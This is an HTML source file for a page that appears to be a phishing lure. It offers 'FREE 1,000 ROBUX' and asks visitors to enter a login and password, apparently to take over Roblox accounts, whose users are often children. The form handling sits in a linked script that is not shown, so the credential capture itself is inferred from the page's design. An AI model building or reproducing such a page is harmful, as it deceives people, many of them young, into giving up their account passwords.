<!DOCTYPE html>
<html lang="uk">
<head>
    <meta charset="UTF-8">
    <title>Log for Free</title>
    <link rel="stylesheet" href="style.css">
    <link rel="icon" type="image/png" href="icon.ico">
</head>
<body>

<div class="robux-bg">
    <span>R$</span><span>R$</span><span>R$</span><span>R$</span>
    <span>R$</span><span>R$</span><span>R$</span><span>R$</span>
    <span>R$</span><span>R$</span>
    </div>

<div class="title">FREE 1,000 ROBUX</div>

<div class="login-container">

    <form class="login-form">
        <h1>Sing in</h1>

        <label for="username">Login</label>
        <input type="text" id="username" name="username" required>

        <label for="password">Password</label>
        <input type="password" id="password" name="password" required>

        <button type="submit">Sing up</button>
    </form>
</div>
<script src="js.js"></script>
</body>
</html>
